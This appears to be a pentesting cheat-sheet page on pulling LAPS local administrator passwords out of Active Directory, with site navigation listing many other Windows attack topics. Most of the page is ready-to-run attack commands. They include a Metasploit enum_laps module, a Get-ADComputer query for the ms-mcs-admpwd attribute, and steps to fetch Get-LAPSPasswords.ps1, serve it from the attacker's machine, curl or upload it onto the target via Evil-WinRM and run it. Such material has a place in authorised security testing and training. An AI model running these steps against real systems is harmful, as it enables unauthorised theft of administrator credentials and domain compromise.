Active Directory

AD CS (Active Directory Certificate Services) Pentesting

AS-REP Roasting

Active Directory Pentesting

Constrained Delegation Attack

DACL (Discretionary Access Control List) Attack

Kerberoasting Attack

Kerberos Pentesting

LAPS (Local Administrator Password Solution) Pentesting

LDAP (Lightweight Directory Access Protocol) Pentesting

LDAP Injection

Netlogon Elavasion of Privilege

Resource-Based Constrained Delegation Attack

SMB (Server Message Block) Pentesting

Shadow Credentials

Protocol

MSRPC (Microsoft Remote Procedure Call) Pentesting

RDP (Remote Desktop Protocol) Pentesting

WinRM (Windows Remote Management) Pentesting

Service

Iperius Backup Service Privilege Escalation

M365 (Microsoft Office 365) Pentesting

ManageEngine ADSelfService Plus PrivEsc

Microsoft Outlook Message (.msg)

Microsoft Word Pentesting

Windows Print Spooler Service

Windows PrivEsc with Unquoted Service Path

Privilege Escalation

Activate Administrator Account on Windows

Add/Edit/Delete Users on Windows

Dumping Credentials from Windows Vault

Dumping Windows Password Hashes

Iperius Backup Service Privilege Escalation

ManageEngine ADSelfService Plus PrivEsc

Mimikatz

Outlook Reminder Privilege Escalation

Switch User on Windows

UAC Windows Privilege Escalation

Windows PrivEsc with AD CS

Windows PrivEsc with DLL Hijacking

Windows PrivEsc with Kerberos

Windows PrivEsc with LocalPotato

Windows PrivEsc with Registry Keys

Windows PrivEsc with RemotePotato

Windows PrivEsc with SeBackupPrivilege

Windows PrivEsc with Unquoted Service Path

Windows Privilege Escalation

Post Exploitation

Windows Pivoting

Forensics

Reading OneDrive Logs

Windows Disk Management

Windows Forensics

Windows Memory Dump Analysis

Windows XML EventLog (EVTX)

PowerShell

PowerView

WSL

WSL Pentesting

Technique

Download Files in Windows

LAPS (Local Administrator Password Solution) Pentesting

Last modified: 2022-12-22

Active Directory Privilege Escalation Windows

LAPS provides management of local account passwords of domain joined computers. Passwords are stored in Active Directory.

Enumeration

msfconsole
use post/windows/gather/credentials/enum_laps
set session 2
exploit

Obtain Administrator's Password

First, check if you are in the LAPS_Readers group.

net user <current-username>
# Global Group memberships  *LAPS_Readers

Using Get-ADComputer

Get-ADComputer gets the information of the Active Directory computer.

Get-ADComputer -Identity '<active-directory-computer-name>' -property 'ms-mcs-admpwd'

Using Get-LAPSPasswords.ps1

Download the Payload in Local Machine

If you are in LAPS_Readers, you can get the administrator's password using Get-LAPSPasswords.ps1.
```
wget https://github.com/kfosaaen/Get-LAPSPasswords/blob/master/Get-LAPSPasswords.ps1
```

Transfer the Payload to Target Machine

via PowerShell

First off, open web server in local machine.

python3 -m http.server 8000

Then curl in target machine

curl http://<local-ip>:8000/Get-LAPSPasswords.ps1 -o .\Get-LAPSPasswords.ps1

via Evil-WinRM

If you connect the remote Windows machine with Evil-WinRM, you can use directly by adding -s flag when connecting.

evil-winrm -i <target-ip> -u username -p password -s /path/to/current/directory

Then just execute the payload in evil-winrm console.

PS > upload .\Get-LAPSPasswords.ps1 c:\Users\<username>\Desktop\Get-LAPSPasswords.ps1

Execute the Payload in Target Machine
```
.\Get-LAPSPasswords.ps1
```

Active Directory

Protocol

Service

Privilege Escalation

Post Exploitation

Forensics

PowerShell

WSL

Technique

LAPS (Local Administrator Password Solution) Pentesting

Enumeration

Obtain Administrator's Password

Using Get-ADComputer

Using Get-LAPSPasswords.ps1

ON THIS PAGE